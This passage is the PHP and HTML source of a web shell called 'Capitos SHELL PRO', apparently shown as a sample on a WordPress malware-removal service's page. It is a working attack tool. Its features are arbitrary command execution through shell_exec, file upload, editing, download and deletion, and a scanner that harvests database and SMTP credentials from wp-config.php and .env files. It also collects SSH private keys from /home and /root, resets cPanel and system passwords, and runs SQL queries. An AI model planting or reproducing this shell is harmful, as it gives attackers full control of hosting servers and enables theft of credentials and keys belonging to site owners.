.tbl td{padding:8px;border-bottom:1px solid #0f0}.tbl tr:hover{background:rgba(0,255,0,.1)}.tbl a{color:#0f0;text-decoration:none;margin:0 5px}
.term{background:#000;border:1px solid #0f0;padding:15px;color:#0f0;min-height:250px;white-space:pre-wrap;margin-top:10px}
.result{background:rgba(0,255,0,.1);border:1px solid #0f0;padding:12px;margin-top:10px;color:#0f0}
.result.error{background:rgba(255,0,0,.2);border-color:#f00;color:#f00}.grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(300px,1fr));gap:15px}
</style></head><body>
<div class="hdr"><div class="logo">
<svg viewBox="0 0 200 200"><circle cx="100" cy="100" r="90" fill="none" stroke="#0f0" stroke-width="3"/>
<path d="M60,80Q100,40 140,80" fill="none" stroke="#0f0" stroke-width="3"/><circle cx="75" cy="90" r="8" fill="#0f0"/>
<circle cx="125" cy="90" r="8" fill="#0f0"/><path d="M70,120Q100,140 130,120" fill="none" stroke="#0f0" stroke-width="3"/>
<path d="M50,150L150,150L140,180L60,180Z" fill="#0f0"/></svg>
<h1>Capitos SHELL PRO</h1></div>
<div><a href="https://t.me/Capitosx" target="_blank" class="btn">📱 @Capitosx</a>
<a href="?logout=1" class="btn" style="background:#f00">LOGOUT</a></div></div>
<div class="info">
<div><b>SERVER:</b> <?php
echo $_SERVER['SERVER_NAME'];
?></div>
<div><b>SYSTEM:</b> <?php
echo php_uname('s') . ' ' . php_uname('r');
?></div>
<div><b>USER:</b> <?php
echo get_current_user() . ' [' . getmyuid() . ']';
?></div>
<div><b>DIR:</b> <?php
echo getcwd();
?></div>
<div><b>IP:</b> <?php
echo $_SERVER['REMOTE_ADDR'];
?></div>
<div><b>PHP:</b> <?php
echo phpversion();
?></div>
</div>
<div class="nav">
<button class="active" onclick="showTab(0)">FILES</button>
<button onclick="showTab(1)">TERMINAL</button>
<button onclick="showTab(2)">UPLOAD</button>
<button onclick="showTab(3)">EDITOR</button>
<button onclick="showTab(4)">SMTP</button>
<button onclick="showTab(5)">CPANEL</button>
<button onclick="showTab(6)">RDP/VPS</button>
<button onclick="showTab(7)">SQL</button>
<button onclick="showTab(8)">INFO</button>
</div>
<div class="content">
<div class="tab active">
<div class="card"><h3>FILE MANAGER</h3>
<form method="get"><input type="text" name="dir" value="<?php
echo $cwd;
?>"><button type="submit" class="btn">GO</button></form>
<table class="tbl"><tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
<?php
$files = @scandir($cwd);
if ($files) {
foreach ($files as $f) {
if ($f == '.') {
continue;
}
$p = $cwd . DIRECTORY_SEPARATOR . $f;
$d = is_dir($p);
$sz = $d ? '[DIR]' : number_format(@filesize($p));
$pm = substr(sprintf('%o', @fileperms($p)), 4);
$tm = date("Y-m-d H:i", @filemtime($p));
echo "<tr><td>" . ($d ? "📁 " : "📄 ");
if ($d) {
echo "<a href='?dir=" . urlencode($p) . "'>{$f}</a>";
} else {
echo $f;
}
echo "</td><td>{$sz}</td><td>{$pm}</td><td>{$tm}</td><td>";
if (!$d) {
echo "<a href='?edit=" . urlencode($p) . "'>EDIT</a>|<a href='?dl=" . urlencode($p) . "'>DL</a>|";
}
echo "<a href='?del=" . urlencode($p) . "' onclick='return confirm(\"Delete?\")'>DEL</a></td></tr>";
}
}
?>
</table></div></div>
<div class="tab"><div class="card"><h3>TERMINAL</h3>
<form method="post"><input type="text" name="cmd" placeholder="Command..." value="<?php
echo isset($_POST['cmd']) ? htmlspecialchars($_POST['cmd']) : '';
?>">
<button type="submit" name="exec" class="btn">EXECUTE</button></form>
<?php
if (isset($_POST['exec'])) {
echo '<div class="term">$ ' . htmlspecialchars($_POST['cmd']) . "\n\n";
echo htmlspecialchars(shell_exec($_POST['cmd'])) . '</div>';
}
?></div></div>
<div class="tab"><div class="card"><h3>UPLOAD</h3>
<form method="post" enctype="multipart/form-data"><input type="file" name="f">
<button type="submit" name="up" class="btn">UPLOAD</button></form>
<?php
if (isset($_POST['up'])) {
$t = $cwd . DIRECTORY_SEPARATOR . basename($_FILES['f']['name']);
if (move_uploaded_file($_FILES['f']['tmp_name'], $t)) {
echo '<div class="result">✓ UPLOADED</div>';
} else {
echo '<div class="result error">✗ FAILED</div>';
}
}
?></div></div>
<div class="tab"><div class="card"><h3>EDITOR</h3>
<form method="post"><input type="text" name="ef" placeholder="File path..." value="<?php
echo isset($_GET['edit']) ? $_GET['edit'] : '';
?>">
<textarea name="ec"><?php
if (isset($_GET['edit']) && file_exists($_GET['edit'])) {
echo htmlspecialchars(file_get_contents($_GET['edit']));
}
?></textarea>
<button type="submit" name="save" class="btn">SAVE</button></form>
<?php
if (isset($_POST['save'])) {
if (file_put_contents($_POST['ef'], $_POST['ec'])) {
echo '<div class="result">✓ SAVED</div>';
} else {
echo '<div class="result error">✗ FAILED</div>';
}
}
?></div></div>
<div class="tab"><div class="card"><h3>SMTP GRABBER</h3>
<button onclick="document.getElementById('smtpForm').submit()" class="btn">EXTRACT</button>
<form id="smtpForm" method="post" style="display:none"><input type="hidden" name="smtp" value="1"></form>
<?php
if (isset($_POST['smtp'])) {
echo '<div class="term">[*] Scanning...\\n\\n';
$found = array();
$patterns = array('/home/*/public_html/wp-config.php', '/home/*/public_html/configuration.php', '/home/*/public_html/.env');
foreach ($patterns as $pat) {
$fls = glob($pat);
if ($fls) {
foreach ($fls as $fl) {
if (is_readable($fl) && is_file($fl)) {
$c = file_get_contents($fl);
if (preg_match_all('/(DB_|MAIL_|smtp).{0,50}/i', $c, $m)) {
echo "✓ {$fl}\n";
foreach ($m[0] as $mm) {
echo " " . htmlspecialchars($mm) . "\n";
}
$found[] = "{$fl}\n" . implode("\n", $m[0]) . "\n\n";
}
}
}
}
}
if ($found) {
$of = 'smtp_' . date('Ymd_His') . '.txt';
file_put_contents($of, implode('', $found));
echo "\n[✓] Saved: {$of}\n";
}
echo '</div>';
}
?></div></div>
<div class="tab"><div class="card"><h3>CPANEL RESET</h3>
<form method="post"><input type="text" name="cpu" placeholder="Username">
<input type="password" name="cpp" placeholder="New Password">
<button type="submit" name="cpr" class="btn">RESET</button></form>
<?php
if (isset($_POST['cpr'])) {
$u = $_POST['cpu'];
$p = $_POST['cpp'];
echo '<div class="term">';
echo "[*] Resetting {$u}...\n\n";
$r1 = shell_exec("echo '{$u}:{$p}'|chpasswd 2>&1");
echo "Method 1:\n" . htmlspecialchars($r1) . "\n\n";
if (file_exists('/usr/local/cpanel/bin/whmapi1')) {
$r2 = shell_exec("/usr/local/cpanel/bin/whmapi1 passwd user={$u} password={$p} 2>&1");
echo "Method 2:\n" . htmlspecialchars($r2) . "\n";
}
echo '</div>';
}
?></div></div>
<div class="tab"><div class="card"><h3>RDP/VPS FINDER</h3>
<button onclick="document.getElementById('rdpForm').submit()" class="btn">SCAN</button>
<form id="rdpForm" method="post" style="display:none"><input type="hidden" name="rdp" value="1"></form>
<?php
if (isset($_POST['rdp'])) {
echo '<div class="term">[*] Scanning...\\n\\n';
$found = array();
$pats = array('/home/*/.ssh/id_rsa', '/root/.ssh/id_rsa', '/home/*/rdp*.txt', '/home/*/vps*.txt');
foreach ($pats as $pat) {
$fls = glob($pat);
if ($fls) {
foreach ($fls as $fl) {
if (is_readable($fl) && is_file($fl) && filesize($fl) < 50000) {
echo "✓ {$fl}\n";
$c = file_get_contents($fl);
$found[] = "{$fl}\n{$c}\n\n";
}
}
}
}
if ($found) {
$of = 'rdp_' . date('Ymd_His') . '.txt';
file_put_contents($of, implode('', $found));
echo "\n[✓] Saved: {$of}\n";
}
echo '</div>';
}
?></div></div>
<div class="tab"><div class="card"><h3>SQL MANAGER</h3>
<form method="post"><div class="grid">
<input type="text" name="dh" placeholder="Host" value="localhost">
<input type="text" name="du" placeholder="User">
<input type="password" name="dp" placeholder="Pass">
<input type="text" name="dn" placeholder="Database"></div>
<textarea name="dq" placeholder="SQL Query..."></textarea>
<button type="submit" name="dsql" class="btn">EXECUTE</button></form>
<?php
if (isset($_POST['dsql'])) {
$cn = @mysqli_connect($_POST['dh'], $_POST['du'], $_POST['dp'], $_POST['dn']);
if ($cn) {
$rs = mysqli_query($cn, $_POST['dq']);
if ($rs && mysqli_num_rows($rs) > 0) {
echo '<table class="tbl"><tr>';
while ($f = mysqli_fetch_field($rs)) {
echo "<th>{$f->name}</th>";
}
echo '</tr>';
while ($r = mysqli_fetch_array($rs)) {
echo '<tr>';
foreach ($r as $v) {
echo '<td>' . htmlspecialchars($v) . '</td>';
}
echo '</tr>';
}
echo '</table>';
} else {
echo '<div class="result">✓ EXECUTED</div>';
}
mysqli_close($cn);
} else {
echo '<div class="result error">✗ CONNECTION FAILED</div>';
}
}
?></div></div>
<div class="tab"><div class="card"><h3>PHP INFO</h3><?php
ob_start();
phpinfo();
echo ob_get_clean();
?></div></div>
</div>
<script>function showTab(n){var t=document.querySelectorAll('.tab');var b=document.querySelectorAll('.nav button');
for(var i=0;i<t.length;i++){t[i].classList.remove('active');b[i].classList.remove('active');}
t[n].classList.add('active');b[n].classList.add('active');}</script>
</body></html>
<?php
if (isset($_GET['dl'])) {
$f = $_GET['dl'];
if (file_exists($f)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($f) . '"');
readfile($f);
exit;
}
}
if (isset($_GET['del'])) {
$f = $_GET['del'];
is_dir($f) ? @rmdir($f) : @unlink($f);
header("Location: ?dir=" . urlencode($cwd));
exit;
}
};
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.